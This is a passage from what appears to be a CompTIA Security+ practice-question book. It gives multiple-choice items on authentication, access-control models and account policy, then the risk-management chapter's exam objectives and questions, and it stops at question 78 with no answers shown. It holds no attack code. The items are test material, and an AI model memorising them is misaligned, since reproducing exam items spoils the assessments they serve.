A. Crossover error rate
B. Leveling
C. Balanced error rate
D. Remediation
16. Mia is responsible for website security for a bank. When a user forgets their password, she wants a method to give them a temporary password. Which of the following would be the best solution for this situation?
A. Facial recognition
B. Digital certificate authentication
C. RBAC
D. TOTP
17. George wants a secure authentication protocol that can integrate with RADIUS and can use digital certificates. Which of the following would be his best choice?
A. CHAP
B. 802.11i
C. 802.1x
D. OAUTH
18. Jacob is responsible for database server security in his company. He is very concerned about preventing unauthorized access to the databases. Which of the following would be the most appropriate for him to implement?
A. ABAC
B. TOTP
C. HIDS
D. DAMP
19. Mason is responsible for security at a company that has traveling salespeople. The company has been using ABAC for access control to the network. Which of the following is an issue that is specific to ABAC and might cause it to incorrectly reject logins?
A. Geographic location
B. Wrong password
C. Remote access is not allowed by ABAC.
D. Firewalls usually block ABAC.
20. You work for a U.S. defense contractor. You are setting up access cards that have chips embedded in them to provide access control for users in your company. Which of the following types of cards would be best for you to use?
A. CAC
B. PIV
C. NFC
D. Smart card
21. Darrell is concerned that users on his network have too many passwords to remember and might write down their passwords, thus creating a significant security risk. Which of the following would be most helpful in mitigating this issue?
A. OAUTH
B. SSO
C. OpenID
D. Kerberos
22. Fares is a security administrator for a large company. Occasionally, a user needs to access a specific resource that they don’t have permission to access. Which access control methodology would be most helpful in this situation?
A. Mandatory Access Control
B. Discretionary Access Control
C. Role-based Access Control
D. Rule-based Access Control
23. You are comparing biometric solutions for your company, and the product you pick must have an appropriate False Acceptance Rate (FAR). Which of the following best describes FAR?
A. How often an unauthorized user is granted access by mistake
B. How readily users accept the new technology, based on ease of use
C. How often an authorized user is not granted access
D. How frequently the system is offline
24. Amelia is looking for a network authentication method that can use digital certificates and does not require end users to remember passwords. Which of the following would best fit her requirements?
A. OAUTH
B. Tokens
C. OpenID
D. RBAC
25. You are responsible for setting up new accounts for your company network. What is the most important thing to keep in mind when setting up new accounts?
A. Password length
B. Password complexity
C. Account age
D. Least privileges
26. Stefan just became the new security officer for a university. He is concerned that student workers who work late on campus could try and log in with faculty credentials. Which of the following would be most effective in preventing this?
A. Time of day restrictions
B. Usage auditing
C. Password length
D. Credential management
27. Jennifer is concerned that some people in her company have more privileges than they should. This has occurred due to people moving from one position to another, and having cumulative rights that exceed the requirements of their current jobs. Which of the following would be most effective in mitigating this issue?
A. Permission auditing
B. Job rotation
C. Preventing job rotation
D. Separation of duties
28. Chloe has noticed that users on her company’s network frequently have simple passwords made up of common words. Thus, they have weak passwords. How could Chloe best mitigate this issue?
A. Increase minimum password length.
B. Have users change passwords more frequently.
C. Require password complexity.
D. Implement Single Sign-On (SSO).
29. Bart is looking for a remote access protocol for his company. It is important that the solution he selects support multiple protocols and use a reliable network communication protocol. Which of the following would be his best choice?
A. RADIUS
B. TACACS+
C. NTLM
D. CHAP
30. You are looking for an authentication method that has one-time passwords and works well with the Initiative for Open Authentication. However, the user should have unlimited time to use the password. Which of the following would be your best choice?
A. CHAP
B. TOTP
C. HOTP
D. ABAC
31. Gerard is trying to find a flexible remote access protocol that can use either TCP or UDP. Which of the following should he select?
A. RADIUS
B. DIAMETER
C. TACACS+
D. TACACS
32. Emiliano is considering voice recognition as part of his access control strategy. What is one weakness with voice recognition?
A. People’s voices change.
B. Systems require training.
C. High false negative rate
D. High false positive rate
33. You are explaining facial recognition to a colleague. What is the most significant drawback to implementing facial recognition?
A. These systems can be expensive.
B. These systems can be fooled with facial hair, glasses, etc.
C. These systems have a high false positive rate.
D. The systems require a long time to observe a face.
34. Mohanned is responsible for account management at his company. He is very concerned about hacking tools that rely on rainbow tables. Which of the following would be most effective in mitigating this threat?
A. Password complexity
B. Password age
C. Password expiration
D. Password length
35. Mary is a security administrator for a mid-sized company. She is trying to securely off-board employees. What should she do with the network account for an employee who is being off-boarded?
A. Disable the account.
B. Delete the account.
C. Change the account password.
D. Leave the account as is.
36. Your supervisor tells you to implement security based on your users’ physical characteristics. Under which type of security would hand scanning and retina scanning fall?
A. CHAP
B. Multifactor
C. Biometrics
D. Token
37. What port does TACACS use?
A. TCP 143
B. TCP and UDP 49
C. TCP 443
D. UDP 53
38. A company-wide policy is being created to define various security levels. Which of the following systems of access control would use documented security levels like Confidential or Secret for information?
A. RBAC
B. MAC
C. DAC
D. BBC
39. There is a common security issue that is extremely hard to control in large environments. It occurs when a user has more computer rights, permissions, and privileges than what is required for the tasks the user needs to fulfill. This is the opposite of what principle?
A. Separation of duties
B. Least privileges
C. Transitive trust
D. Account management
40. Users in your network are able to assign permissions to their own shared resources. Which of the following access control models is used in your network?
A. DAC
B. RBAC
C. MAC
D. ABAC
41. John is performing a port scan of a network as part of a security audit. He notices that the domain controller is using secure LDAP. Which of the following ports would lead him to that conclusion?
A. 53
B. 389
C. 443
D. 636
42. Which of the following access control methods grants permissions based on the user’s position in the organization?
A. MAC
B. RBAC
C. DAC
D. ABAC
43. Which of the following can be used as a means for dual-factor authentication?
A. Password and PIN number
B. RADIUS and L2TP
C. LDAP and WPA
D. Iris scan and password
44. Kerberos uses which of the following to issue tickets?
A. Authentication service
B. Certificate authority
C. Ticket-granting service
D. Key distribution center
45. A company requires that a user’s credentials include providing something they know and something they are in order to gain access to the network. Which of the following types of authentication is being described?
A. Token
B. Two-factor
C. Kerberos
D. Biometrics
46. Samantha is looking for an authentication method that incorporates the X.509 standard and will allow authentication to be digitally signed. Which of the following authentication methods would best meet these requirements?
A. Certificate-based authentication
B. OAUTH
C. Kerberos
D. Smart cards
47. Your company relies heavily on cloud and SaaS service providers such as salesforce.com, Office365, and Google. Which of the following would you have security concerns about?
A. LDAP
B. TACACS+
C. SAML
D. Transitive trust
48. Greg is responsible for database security for his company. He is concerned about authentication and permissions. Which of the following should be his first step?
A. Implement minimum password length.
B. Implement password lockout.
C. Conduct a permissions audit.
D. Ensure least privileges.
49. Which of the following is a step in account maintenance?
A. Implement two-factor authentication.
B. Check for time of day restrictions.
C. Review onboarding processes.
D. Check to see that all accounts are for active employees.
50. Tyrell works as a security officer for a mid-sized bank. All the employees only work in the office; there are no employees who work remotely or travel for company business. Tyrell is concerned about someone using an employee’s login credentials to access the bank’s network. Which of the following would be most effective in mitigating this threat?
A. Kerberos authentication
B. TOTP
C. Location-based policies
D. Group-based access control
51. Henry is an employee at Acme Company. The company requires him to change his password every three months. He has trouble remembering new passwords, so he keeps switching between just two passwords. Which policy would be most effective in preventing this?
A. Password complexity
B. Password history
C. Password length
D. Password age
52. Sheila is concerned that some users on her network may be accessing files that they should not—specifically, files that are not required for their job tasks. Which of the following would be most effective in determining if this is happening?
A. Usage auditing and review
B. Permissions auditing and review
C. Account maintenance
D. Policy review
53. In which of the following scenarios would using a shared account pose the least security risk?
A. For a group of tech support personnel
B. For guest Wi-Fi access
C. For students logging in at a university
D. For accounts with few privileges
54. Which of the following is not a part of password complexity?
A. Using both uppercase and lowercase letters
B. Minimum password length
C. Using numbers
D. Using symbols (such as $, #, etc.)
55. Jane is setting up login accounts for federated identities. She wants to avoid requiring the users to remember login credentials and allow them to use their logins from the originating network. Which of the following technologies would be most suitable for implementing this?
A. Credential management
B. OAUTH
C. Kerberos
D. Shibboleth
56. Sam is responsible for password management at a large company. Sometimes users cannot recall their passwords. What would be the best solution for him to address this?
A. Changing password history length
B. Implementing password recovery
C. Eliminating password complexity
D. Lengthening password age
57. You are a security administrator for an insurance company. You have discovered that there are a few active accounts for employees who left the company over a year ago. Which of the following would best address this issue?
A. Password complexity
B. Offboarding procedures
C. Onboarding procedures
D. Password expiration
58. Maria is responsible for security at a small company. She is concerned about unauthorized devices being connected to the network. She is looking for a device authentication process. Which of the following would be the best choice for her?
A. CHAP
B. Kerberos
C. 802.11i
D. 802.1x
59. Laura is a security admin for a mid-sized mortgage company. She wants to ensure that the network is using the most secure login and authentication scheme possible. Which of the following would be her best choice?
A. Iris scanning
B. Fingerprint scanning
C. Multifactor authentication
D. Smart cards
60. Charles is a CISO for an insurance company. He recently read about an attack wherein an attacker was able to enumerate all the network resources, and was able to make some resources unavailable. All this was done by exploiting a single protocol. Which protocol should Charles secure to mitigate this attack?
A. SNMP
B. LDAP
C. HTTP
D. DHCP
61. Robert is using PAP for authentication in his network. What is the most significant weakness in PAP?
A. Unsigned authentication
B. Single factor
C. Credentials sent in cleartext
D. PAP does not support TACACS+.
62. You are responsible for account access control and authorization at a large university. There are approximately 30,000 students and 1,200 faculty/staff for whom you must manage accounts. Which of the following would be the best access control/account management approach?
A. Group-based
B. Location-based
C. MAC
D. DAC
63. Which of the following is most important in managing account permissions?
A. Account recertification
B. Usage auditing
C. Standard naming conventions
D. Account recovery
64. Which of the following would be the best choice for naming the account of John Smith, who is a domain administrator?
A. dm_jsmith
B. jsmithAdmin
C. AdministratorSmith
D. jsmith
65. Megan is very concerned about file system security on her network servers. Which of the following is the most basic form of file system security?
A. Encryption
B. Access control
C. Auditing
D. RAID
66. Karen is responsible for account security in her company. She has discovered a receptionist whose account has a six-character password that has not been changed in two years, and her password history is not being maintained. What is the most significant problem with this account?
A. Nothing, this is adequate for a low-security position.
B. The password length is the most significant problem.
C. The lack of password history is the most significant problem.
D. The age of the password is the most significant problem.
67. When you’re offboarding an employee, which of the following is the first thing you should do?
A. Audit their computer.
B. Conduct an out-processing questionnaire.
C. Disable accounts.
D. Delete accounts.
68. Which of the following is a difference between TACACS and TACACS+?
A. TACACS uses TCP, TACACS+ uses UDP
B. TACACS uses UDP, TACACS+ uses TCP
C. TACACS uses TCP or UDP, TACACS+ uses UDP
D. TACACS uses UDP, TACACS+ uses UDP or TCP
69. Greg is considering using CHAP or MS-CHAPv2 for authenticating remote users. Which of the following is a major difference between the two protocols?
A. CHAP uses a hash for the challenge, MS-CHAPv2 uses AES.
B. CHAP provides mutual authentication, MS-CHAPv2 does not.
C. CHAP uses AES for the challenge, MS-CHAPv2 uses a hash.
D. MS-CHAPv2 provides mutual authentication, CHAP does not.
70. Terrance is looking for a physical access solution that uses asymmetric cryptography (public key cryptography) to authorize the user. What type of solution is this?
A. Asynchronous password token
B. Challenge response token
C. TOTP token
D. Static password token
71. Which access control model is based on the Trusted Computer System Evaluation Criteria (TCSEC)?
A. ABAC
B. MAC
C. RBAC
D. DAC
72. Mary is responsible for the security of database servers at a mortgage company. The servers are Windows Server 2016. She is concerned about file system security. Which of the following Microsoft features would be most helpful to her in implementing file system security?
A. Password policies
B. EFS
C. Account lockout
D. UAC
73. Santiago manages database security for a university. He is concerned about ensuring that appropriate security measures are implemented. Which of the following would be most important to database security?
A. Password policies
B. Antivirus
C. EFS
D. Access control policies
74. Ingrid is reviewing her company’s recertification policy. Which of the following is the best reason to recertify?
A. To audit usage
B. To enhance onboarding
C. To audit permissions
D. To manage credentials
75. Emma is concerned about credential management. Users on her network often have over a half-dozen passwords to remember. She is looking for a solution to this problem. Which of the following would be the best way to address this issue?
A. Implement a manager.
B. Use shorter passwords.
C. Implement OAUTH.
D. Implement Kerberos.
76. Magnus is concerned about someone using a password cracker on computers in his company. He is concerned that crackers will attempt common passwords in order to log in to a system. Which of the following would be best for mitigating this threat?
A. Password age restrictions
B. Password minimum length requirements
C. Account lockout policies
D. Account usage auditing
77. Lucas is looking for an XML-based open standard for exchanging authentication information. Which of the following would best meet his needs?
A. SAML
B. OAUTH
C. RADIUS
D. NTLM
78. Which of the following processes transpires when a user provides a correct username and password?
A. Identification
B. Authentication
C. Authorization
D. Accounting
79. Min-seo is looking for a type of access control that enforces authorization rules by the operating system. Users cannot override authentication or access control policies. Which of the following best fits this description?
A. DAC
B. MAC
C. RBAC
D. ABAC
80. Hinata is considering biometric access control solutions for her company. She is concerned about the crossover error rate (CER). Which of the following most accurately describes the CER?
A. The rate of false acceptance
B. The rate of false rejection
C. The point at which false rejections outpace false acceptances
D. The point at which false rejections and false acceptances are equal
81. Joshua is looking for an authentication protocol that would be effective at stopping session hijacking. Which of the following would be his best choice?
A. CHAP
B. PAP
C. SPAP
D. RADIUS
82. David is trying to select an authentication method for his company. He needs one that will support REST as well as multiple web-based and mobile clients. Which of the following would be his best choice?
A. Shibboleth
B. RADIUS
C. OpenID Connect
D. OAuth
83. Phillip is examining options for controlling physical access to the server room at his company. He wants a hands-free solution. Which of the following would be his best choice?
A. Smart cards
B. Proximity cards
C. Tokens
D. Fingerprint scanner
84. Which of the following is the most significant disadvantage of federated identities?
A. They cannot be used with Kerberos.
B. They don’t implement least privileges.
C. Poor password management
D. Transitive trust
85. Max is implementing type II authentication for his company. Which of the following would be an example of type II authentication?
A. Strong passwords
B. Retinal scan
C. Smart cards
D. Timed one-time passwords
86. Nicole is implementing a server authentication method that depends on a TPM in the server. Which of the following best describes this approach?
A. Hardware-based access control
B. Software-based access control
C. Digital certificate–based access control
D. Chip-based access control
Chapter 5
Risk Management
The CompTIA Security+ Exam SY0-501 topics covered in this chapter include the following:
✓ 5.1 Explain the importance of policies, plans and procedures related to organizational security.
  ■ Standard operating procedure
  ■ Agreement types
    ■ BPA
    ■ SLA
    ■ ISA
    ■ MOU/MOA
  ■ Personnel management
    ■ Mandatory vacations
    ■ Job rotation
    ■ Separation of duties
    ■ Clean desk
    ■ Background checks
    ■ Exit interviews
    ■ Role-based awareness training
      ■ Data owner
      ■ System administrator
      ■ System owner
      ■ User
      ■ Privileged user
      ■ Executive user
    ■ NDA
    ■ Onboarding
    ■ Continuing education
    ■ Acceptable use policy/rules of behavior
    ■ Adverse actions
  ■ General security policies
    ■ Social media networks/applications
    ■ Personal email
✓ 5.2 Summarize business impact analysis concepts.
  ■ RTO/RPO
  ■ MTBF
  ■ MTTR
  ■ Mission-essential functions
  ■ Identification of critical systems
  ■ Single point of failure
  ■ Impact
    ■ Life
    ■ Property
    ■ Safety
    ■ Finance
    ■ Reputation
  ■ Privacy impact assessment
  ■ Privacy threshold assessment
✓ 5.3 Explain risk management processes and concepts.
  ■ Threat assessment
    ■ Environmental
    ■ Manmade
    ■ Internal vs external
  ■ Risk assessment
    ■ SLE
    ■ ALE
    ■ ARO
    ■ Asset value
    ■ Risk register
    ■ Likelihood of occurrence
    ■ Supply chain assessment
    ■ Impact
    ■ Quantitative
    ■ Qualitative
    ■ Testing
      ■ Penetration testing authorization
      ■ Vulnerability testing authorization
    ■ Risk response techniques
      ■ Accept
      ■ Transfer
      ■ Avoid
      ■ Mitigate
  ■ Change management
✓ 5.4 Given a scenario, follow incident response procedures.
  ■ Incident response plan
    ■ Documented incident types/category definitions
    ■ Roles and responsibilities
    ■ Reporting requirements/escalation
    ■ Cyber-incident response teams
    ■ Exercise
  ■ Incident response process
    ■ Preparation
    ■ Identification
    ■ Containment
    ■ Eradication
    ■ Recovery
    ■ Lessons learned
✓ 5.5 Summarize basic concepts of forensics.
  ■ Order of volatility
  ■ Chain of custody
  ■ Legal hold
  ■ Data acquisition
    ■ Capture system image
    ■ Network traffic and logs
    ■ Capture video
    ■ Record time offset
    ■ Take hashes
    ■ Screenshots
    ■ Witness interviews
  ■ Preservation
  ■ Recovery
  ■ Strategic intelligence/counterintelligence gathering
    ■ Active logging
  ■ Track man-hours
✓ 5.6 Explain disaster recovery and continuity of operation concepts.
  ■ Recovery sites
    ■ Hot site
    ■ Warm site
    ■ Cold site
  ■ Order of restoration
  ■ Backup concepts
    ■ Differential
    ■ Incremental
    ■ Snapshots
    ■ Full
  ■ Geographic considerations
    ■ Off-site backups
    ■ Distance
    ■ Location selection
    ■ Legal implications
    ■ Data sovereignty
  ■ Continuity of operation planning
    ■ Exercises/tabletop
    ■ After-action reports
    ■ Failover
    ■ Alternate processing sites
    ■ Alternate business practices
✓ 5.7 Compare and contrast various types of controls.
  ■ Deterrent
  ■ Preventive
  ■ Detective
  ■ Corrective
  ■ Compensating
  ■ Technical
  ■ Administrative
  ■ Physical
✓ 5.8 Given a scenario, carry out data security and privacy practices.
  ■ Data destruction and media sanitization
    ■ Burning
    ■ Shredding
    ■ Pulping
    ■ Pulverizing
    ■ Degaussing
    ■ Purging
    ■ Wiping
  ■ Data sensitivity labeling and handling
    ■ Confidential
    ■ Private
    ■ Public
    ■ Proprietary
    ■ PII
    ■ PHI
  ■ Data roles
    ■ Owner
    ■ Steward/custodian
    ■ Privacy officer
  ■ Data retention
  ■ Legal and compliance
1. You are a manager of a bank and you suspect one of your tellers has stolen money from their station. After talking with your supervisor, you place the employee on leave with pay, suspend their computer account, and obtain their proximity card and keys to the building. Which of the following policies did you follow?
A. Mandatory vacations
B. Exit interviews
C. Adverse actions
D. Onboarding
2. Which of the following principles stipulates that multiple changes to a computer system should not be made at the same time?
A. Due diligence
B. Acceptable use
C. Change management
D. Due care
3. Why are penetration tests often not advised?
A. It can be disruptive for the business activities.
B. It is able to measure and authenticate the efficiency of a company’s defensive mechanisms.
C. It’s able to find both known and unknown hardware or software weaknesses.
D. It permits the exploration of real risks and gives a precise depiction of a company’s IT infrastructure security posture at any given time.
4. You are a security engineer and discovered an employee using the company’s computer systems to operate their small business. The employee installed their personal software on the company’s computer and is using the computer hardware, such as the USB port. What policy would you recommend the company implement to prevent any risk of the company’s data and network being compromised?
A. Acceptable use policy
B. Clean desk policy
C. Mandatory vacation policy
D. Job rotation policy
5. What should be done to back up tapes that are stored off-site?
A. Generate a file hash for each backup file.
B. Scan the backup data for viruses.
C. Perform a chain of custody on the backup tape.
D. Encrypt the backup data.
6. Which recovery site is the easiest to test?
A. Warm site
B. Cold site
C. Hot site
D. Medium site
7. Katelyn is a network technician for a manufacturing company. She is testing a network forensic capturing software and plugs her laptop into an Ethernet switch port and begins capturing network traffic. Later she begins to analyze the data and notices some broadcast and multicast packets, as well as her own laptop’s network traffic. Which of the following statements best describes why Katelyn was unable to capture all network traffic on the switch?
A. Each port on the switch is an isolated broadcast domain.
B. Each port on the switch is an isolated collision domain.
C. Promiscuous mode must be enabled on the NIC.
D. Promiscuous mode must be disabled on the NIC.
8. Which of the following is not a step of the incident response process?
A. Snapshot
B. Preparation
C. Recovery
D. Containment
9. Which of the following is another term for technical controls?
A. Access controls
B. Logical controls
C. Detective controls
D. Preventive controls
10. You are a security manager for your company and need to reduce the risk of employees working in collusion to embezzle funds. Which of the following policies would you implement?
A. Mandatory vacations
B. Clean desk
C. NDA
D. Continuing education
11. You are a security administrator, and your manager has asked you about protecting the privacy of personally identifiable information (PII) that is collected. Which of the following would be the best option to fulfill the request?
A. PIA
B. BIA
C. RTO
D. SPF
12. Which of the following plans best identifies critical systems and components to ensure the assets are protected?
A. DRP
B. BCP
C. IT contingency plan
D. Succession plan
13. After your company implemented a clean desk policy, you have been asked to secure physical documents every night. Which of the following would be the best solution?
A. Department door lock
B. Locking cabinets and drawers
C. Proximity card
D. Onboarding
14. Your manager has instructed the team to test certain systems based on the business continuity plan to ensure they are operating properly. The manager wants to ensure there are no overlaps in the plan before implementing the test. Which continuity of operation planning concept is your manager referring to?
A. After-action report
B. Failover
C. Eradication
D. Tabletop exercise
15. Which of the following is an example of PHI?
A. Passport number
B. Criminal record
C. Fingerprints
D. Name of school attended
16. Which of the following techniques attempts to predict the likelihood a threat will occur and assigns monetary values should a loss occur?
A. Change management
B. Vulnerability assessment
C. Qualitative risk assessment
D. Quantitative risk assessment
17. Your competitors are offering a new service that is predicted to sell strong. After much careful research, your company has decided not to launch a competing service due to the uncertainty of the market and the enormous investment required. Which of the following best describes the company’s decision?
A. Risk transfer
B. Risk avoidance
C. Risk acceptance
D. Risk mitigation
18. Which of the following agreements is less formal than a traditional contract but still has a certain level of importance to all parties involved?
A. SLA
B. BPA
C. ISA
D. MOU
19. Your company is considering moving its mail server to a hosting company. This will help reduce hardware and server administrator costs at the local site. Which of the following documents would formally state the reliability and recourse if the reliability is not met?
A. MOU
B. SLA
C. ISA
D. BPA
20. You have an asset that is valued at $16,000, the exposure factor of a risk affecting that asset is 35%, and the annualized rate of occurrence is 75%. What is the SLE?
A. $5,600
B. $5,000
C. $4,200
D. $3,000
21. During a meeting, you present management with a list of access controls used on your network. Which of the following controls is an example of a corrective control?
A. IDS
B. Audit logs
C. Antivirus software
D. Router
22. You are the new security administrator and have discovered your company lacks deterrent controls. Which of the following would you install that satisfies your needs? (Choose two.)
A. Lighting
B. Motion sensor
C. No trespassing signs
D. Antivirus scanner
23. Your company’s security policy includes system testing and security awareness training guidelines. Which of the following control types is this?
A. Detective technical control
B. Preventive technical control
C. Detective administrative control
D. Preventive administrative control
24. Which step of the incident response process occurs after containment?
A. Preparation
B. Recovery
C. Identification
D. Eradication
25. You are a security administrator for your company and you identify a security risk. You decide to continue with the current security plan. However, you develop a contingency plan in case the security risk occurs. Which of the following type of risk response technique are you demonstrating?
A. Accept
B. Transfer
C. Avoid
D. Mitigate
26. Which of the following best visually shows the state of a computer at the time it was collected by law enforcement?
A. Screenshots
B. Identification
C. Tabletop exercise
D. Generate hash values
27. You are asked to protect the company’s data should a complete disaster occur. Which action would be the best option for this request?
A. Back up all data to tape, and store those tapes at an alternate location within the city.
B. Back up all data to tape, and store those tapes at an alternate location in another city.
C. Back up all data to disk, and store the disk in a safe in the company’s basement.
D. Back up all data to disk, and store the disk in a safe at the network administrator’s home.
28. Which of the following would not be a purpose of a privacy threshold analysis?
A. Identify programs and systems that are privacy-sensitive.
B. Demonstrate the inclusion of privacy considerations during the review of a program or system.
C. Identify systems that are considered a single point of failure.
D. Demonstrate compliance with privacy laws and regulations.
29. You have purchased new laptops for your salespeople. You plan to dispose of the hard drives of the former laptops as part of a company computer sale. Which of the following methods would you use to properly dispose of the hard drives?
A. Destruction
B. Shredding
C. Purging
D. Formatting
30. You are the head of the IT department of a school and are looking for a way to promote safe and responsible use of the Internet for students. With the help of the teachers, you develop a document for students to sign that describes methods of accessing the Internet on the school’s network. Which of the following best describes this document?
A. Service level agreement
B. Acceptable use policy
C. Incident response plan
D. Chain of custody
31. You are the security administrator and have discovered a malware incident. Which of the following responses should you do first?
A. Recovery
B. Eradication
C. Containment
D. Identification
32. You are an IT administrator for a company and you are adding new employees to an organization’s identity and access management system. Which of the following best describes the process you are performing?
A. Onboarding
B. Offboarding
C. Adverse action
D. Job rotation
33. Your company is partnering with another company and requires systems to be shared. Which of the following agreements would outline how the shared systems should be interfaced?
A. BPA
B. MOU
C. SLA
D. ISA
34. Mark is an office manager at a local bank branch. He wants to ensure customer information isn’t compromised when the deskside employees are away from their desks for the day. What security concept would Mark use to mitigate this concern?
A. Clean desk
B. Background checks
C. Continuing education
D. Job rotation
35. You are a security administrator and advise the web development team to include a CAPTCHA on the web page where users register for an account. Which of the following controls is this referring to?
A. Deterrent
B. Detective
C. Compensating
D. Degaussing
36. Which of the following is not a common security policy type?
A. Acceptable use policy
B. Social media policy
C. Password policy
D. Parking policy
37. As the IT security officer, you are configuring data label options for your company’s research and development file server. Regular users can label documents as contractor, public, or internal. Which label should be assigned to company trade secrets?
A. High
B. Top secret
C. Proprietary
D. Low
38. Users are currently accessing their personal email through company computers, so you and your IT team have created a security policy for email use. What is the next step after creating and approving the email use policy?
A. Encrypt all user email messages.
B. Provide security user awareness training.
C. Provide every employee with their own device to access their personal email.
D. Forward all personal emails to their company email account.
39. Which of the following is not a physical security control?
A. Motion detector
B. Fence
C. Antivirus software
D. CCTV
40. Which of the following might you find in a DRP?
A. Single point of failure
B. Prioritized list of critical computer systems
C. Exposure factor
D. Asset value
41. Your security manager wants to decide which risks to mitigate based on cost. What is this an example of?
A. Quantitative risk assessment
B. Qualitative risk assessment
C. Business impact analysis
D. Threat assessment
42. Your company has outsourced its proprietary processes to Acme Corporation. Due to technical issues, Acme Corporation wants to include a third-party vendor to help resolve the technical issues. Which of the following must Acme Corporation consider before sending data to the third party?
A. This data should be encrypted before it is sent to the third-party vendor.
B. This may constitute unauthorized data sharing.
C. This may violate the privileged user role-based awareness training.
D. This may violate a nondisclosure agreement.
43. Zack is a security administrator who has been given permission to run a vulnerability scan on the company’s wireless network infrastructure. The results show TCP ports 21 and 23 open on most hosts. What port numbers do these refer to? (Choose two.)
A. FTP
B. SMTP
C. Telnet
D. DNS
44. Which of the following backup concepts is the quickest backup but slowest restore?
A. Incremental
B. Differential
C. Full
D. Snapshots
45. Which of the following operations should you undertake to avoid mishandling of tapes, removable drives, CDs, and DVDs?
A. Degaussing
B. Acceptable use
C. Data labeling
D. Wiping
46. Which of the following can be classified as a single point of failure?
A. Failover
B. A cluster
C. Load balancing
D. A configuration
47. Which of the following are considered detective controls?
A. Closed-circuit television (CCTV)
B. Guard
C. Firewall
D. IPS
48. Your CIO wants to move the company’s large sets of sensitive data to an SaaS cloud provider to limit the storage and infrastructure costs. Both the cloud provider and the company are required to have a clear understanding of the security controls that will be applied to protect the sensitive data. What type of agreement would the SaaS cloud provider and your company initiate?
A. MOU
B. BPA
C. SLA
D. ISA
49. Which of the following is typically included in a BPA?
A. Clear statements detailing the expectation between a customer and a service provider
B. The agreement that a specific function or service will be delivered at the agreed-upon level of performance
C. Sharing of profits and losses and the addition or removal of a partner
D. Security requirements associated with interconnecting IT systems
50. Your team powered off the SQL database server for over 7 hours to perform a test. Which of the following is the most likely reason for this?
A. Business impact analysis
B. Succession plan
C. Continuity of operations plan
D. Service level agreement
51. Which of the following role-based positions should receive training on how to manage a particular system?
A. Users
B. Privileged users
C. Executive users
D. System owners
52. You maintain a network of 150 computers and must determine which hosts are secure and which are not. Which of the following tools would best meet your need?
A. Vulnerability scanner
B. Protocol analyzer
C. Port scanner
D. Password cracker
53. You have been instructed to introduce an affected system back into the company’s environment and be sure that it will not lead to another incident. You test, monitor, and validate that the system is not being compromised by any other means. Which of the incident response processes have you completed?
A. Lessons learned
B. Preparation
C. Recovery
D. Containment
54. You discover that an investigator made a few mistakes during a recent forensic investigation. You want to ensure the investigator follows the appropriate process for the collection, analysis, and preservation of evidence. Which of the following terms should you use for this process?
A. Incident handling
B. Legal hold
C. Order of volatility
D. Chain of custody
55. You receive a call from the help desk manager stating that there has been an increase in calls from users reporting their computers are infected with malware. Which of the following incident response steps should be completed first?
A. Containment
B. Eradication
C. Lessons learned
D. Identification
56. Which of the following are examples of custodian security roles? (Choose two.)
A. Human resources employee
B. Sales executive
C. CEO
D. Server backup operator
57. You are the network administrator of your company, and the manager of a retail site located across town has complained about the loss of power to their building several times this year. The branch manager is asking for a compensating control to overcome the power outage. What compensating control would you recommend?
A. Firewall
B. Security guard
C. IDS
D. Backup generator
58. James is a security administrator and is attempting to block unauthorized access to the desktop computers within the company’s network. He has configured the computers’ operating systems to lock after 5 minutes of no activity. What type of security control has James implemented?
A. Preventive
B. Corrective
C. Deterrent
D. Detective
59. Which of the following terms best describes sensitive medical information?
A. AES
B. PHI
C. PII
D. TLS
60. An accounting employee changes roles with another accounting employee every 4 months. What is this an example of?
A. Separation of duties
B. Mandatory vacation
C. Job rotation
D. Onboarding
61. Which of the following are considered inappropriate places to store backup tapes? (Choose two.)
A. Near a workstation
B. Near a speaker
C. Near a CRT monitor
D. Near an LCD screen
62. You are a member of your company’s security response team and have discovered an incident within your network. You are instructed to remove and restore the affected system. You restore the system with the original disk image and then install patches and disable any unnecessary services to harden the system against any future attacks. Which incident response process have you completed?
A. Eradication
B. Preparation
C. Containment
D. Recovery
63. You are a security administrator and have decided to implement a unified threat management (UTM) appliance within your network. This appliance will provide antimalware, spam filtering, and content inspection along with other protections. Which of the following statements best describes the potential problem with this plan?
A. The protections can only be performed one at a time.
B. This is a complex plan because you will manage several complex platforms.
C. This could create the potential for a single point of failure.
D. You work with a single vendor and its support department.
64. You are attending a risk analysis meeting and are asked to define internal threats. Which of the following is not considered an internal threat?
A. Employees accessing external websites through the company’s hosts
B. Embezzlement
C. Threat actors compromising a network through a firewall
D. Users connecting a personal USB thumb drive to a workstation
65. You are the network director and are creating the following year’s budget. You submit forensic dollar amounts for the cyber incident response team. Which of the following would you not submit? (Choose two.)
A. ALE amounts
B. SLE amounts
C. Training expenses
D. Man-hour expenses
66. Computer evidence of a crime is preserved by making an exact copy of the hard disk. Which of the following does this demonstrate?
A. Chain of custody
B. Order of volatility
C. Capture system image
D. Taking screenshots
67. Which option is an example of a workstation not hardened?
A. Risk
B. Threat
C. Exposure
D. Mitigate
68. Which of the following elements should not be included in the preparation phase of the incident response process?
A. Policy
B. Lesson learned documentation
C. Response plan/strategy
D. Communication
69. Which of the following does not minimize security breaches committed by internal employees?
A. Job rotation
B. Separation of duties
C. Nondisclosure agreements signed by employees
D. Mandatory vacations
70. You find one of your employees posting negative comments about the company on Facebook and Twitter. You also discover the employee is sending negative comments from their personal email on the company’s computer. You are asked to implement a policy to help the company avoid any negative reputation in the marketplace. Which of the following would be the best option to fulfill the request?
A. Account policy enforcement
B. Change management
C. Security policy
D. Risk assessment
71. Which of the following statements best describes a differential backup?
A. Only the changed portions of files are backed up.
B. All files are copied to storage media.
C. Files that have changed since the last full backup are backed up.
D. Only files that have changed since the last full or incremental backup are backed up.
72. During which step of the incident response process does root cause analysis occur?
A. Preparation
B. Lessons learned
C. Containment
D. Recovery
73. Which of the following types of testing can help identify risks? (Choose two.)
A. Quantitative
B. Penetration testing
C. Vulnerability testing
D. Qualitative
74. What can a company do to prevent sensitive data from being retrieved by dumpster diving?
A. Degaussing
B. Capture system image
C. Shredding
D. Wiping
75. You are a network administrator and have been asked to send a large file that contains PII to an accounting firm. Which of the following protocols would it be best to use?
A. Telnet
B. FTP
C. SFTP
D. SMTP
76. Zackary is a network backup engineer and performs a full backup each Sunday evening and an incremental backup Monday through Friday evenings. One of the company’s network servers crashes on Thursday afternoon. How many backups will Zack need to do to restore the server?
A. Two
B. Three
C. Four
D. Five
77. Your company website is hosted by an Internet service provider. Which of the following risk response techniques is in use?
A. Risk avoidance
B. Risk register
C. Risk acceptance
D. Risk mitigation
78. A call center leases a new space across town, complete with a functioning computer network that mirrors the current live site. A high-speed network link continuously synchronizes data between the two sites. Which of the following describes the site at the new leased location?
